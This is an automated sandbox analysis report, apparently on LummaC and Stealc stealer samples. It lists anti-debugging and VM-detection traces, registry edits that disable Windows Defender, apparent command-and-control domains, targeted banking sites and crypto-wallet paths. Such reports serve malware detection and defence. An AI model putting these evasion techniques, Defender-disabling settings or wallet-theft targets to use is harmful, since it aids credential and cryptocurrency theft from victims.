Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 619B19 second address: 619B3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAF8FC5090h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jbe 00007FAAF8FC5086h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 619B3D second address: 619B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61AB40 second address: 61AB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61AB44 second address: 61AB69 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAF9128026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAF9128039h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61AB69 second address: 61AB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61AB6D second address: 61AB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAF9128038h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61BD49 second address: 61BD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61D9DE second address: 61D9E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61D9E2 second address: 61D9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61D9E8 second address: 61D9F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAF912802Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61EA7A second address: 61EA8E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAF8FC508Ah 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61EA8E second address: 61EAFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FAAF9128028h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+124538DEh], edx 0x0000002b push 00000000h 0x0000002d sbb bx, 2514h 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+122D3666h], ecx 0x0000003a xchg eax, esi 0x0000003b jmp 00007FAAF9128034h 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007FAAF912802Eh 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 61F9A2 second address: 61FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FAAF8FC5088h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007FAAF8FC508Bh 0x00000027 mov bh, al 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FAAF8FC5088h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D35B5h] 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+122D3073h], edi 0x00000053 push eax 0x00000054 pushad 0x00000055 jmp 00007FAAF8FC508Dh 0x0000005a pushad 0x0000005b ja 00007FAAF8FC5086h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Special instruction interceptor: First address: F67A87 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Special instruction interceptor: First address: F67994 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Special instruction interceptor: First address: 110C5DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Special instruction interceptor: First address: 11A0D70 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Special instruction interceptor: First address: 45DCD6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Special instruction interceptor: First address: 5FB99F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Special instruction interceptor: First address: 5FA8A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Special instruction interceptor: First address: 62355B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Special instruction interceptor: First address: 68BFFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Special instruction interceptor: First address: 69FD88 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Special instruction interceptor: First address: 69FE2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Special instruction interceptor: First address: 865762 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Special instruction interceptor: First address: 8C4BDE instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Memory allocated: 48C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Memory allocated: 4AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Memory allocated: 6AD0000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Code function: 13_2_005D89CE rdtsc 13_2_005D89CE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\BVGvbpplT8.exe TID: 5236 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe TID: 776 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe TID: 504 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe TID: 936 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe TID: 3544 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe TID: 5140 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe TID: 7992 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe, 44WNAJWW05E0258PKFVID8DSXYO93MX.exe, 0000000D.00000002.2650616196.00000000005DD000.00000040.00000001.01000000.00000006.sdmp, O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2626425204.000000000081D000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BVGvbpplT8.exe, BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2228548253.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarer
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe, 0000000D.00000002.2650616196.00000000005DD000.00000040.00000001.01000000.00000006.sdmp, O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2626425204.000000000081D000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: BVGvbpplT8.exe, 00000001.00000003.2284863834.0000000005C2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\BVGvbpplT8.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Code function: 13_2_005D89CE rdtsc 13_2_005D89CE
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Code function: 13_2_0045B96C LdrInitializeThunk, 13_2_0045B96C
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: O215CKAM4VJZ3EV7.exe PID: 8020, type: MEMORYSTR
LummaC encrypted strings found
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: BVGvbpplT8.exe, 00000001.00000003.2155675214.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sweepyribs.lat
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe, 0000000D.00000002.2650815301.0000000000620000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: *Program Manager
Source: O215CKAM4VJZ3EV7.exe, 0000000E.00000002.2627147094.0000000000860000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: EProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: BVGvbpplT8.exe, BVGvbpplT8.exe, 00000001.00000003.2410612554.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2410464131.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370407787.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370543743.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2370285977.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, BVGvbpplT8.exe, 00000001.00000003.2387198787.0000000000D61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: BVGvbpplT8.exe PID: 4060, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2625371744.0000000000451000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2570990607.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: O215CKAM4VJZ3EV7.exe PID: 8020, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: BVGvbpplT8.exe String found in binary or memory: Wallets/Electrum
Source: BVGvbpplT8.exe String found in binary or memory: Wallets/ElectronCash
Source: BVGvbpplT8.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: BVGvbpplT8.exe String found in binary or memory: window-state.json
Source: BVGvbpplT8.exe, 00000001.00000003.2467790172.0000000000D53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le
Source: BVGvbpplT8.exe String found in binary or memory: ExodusWeb3
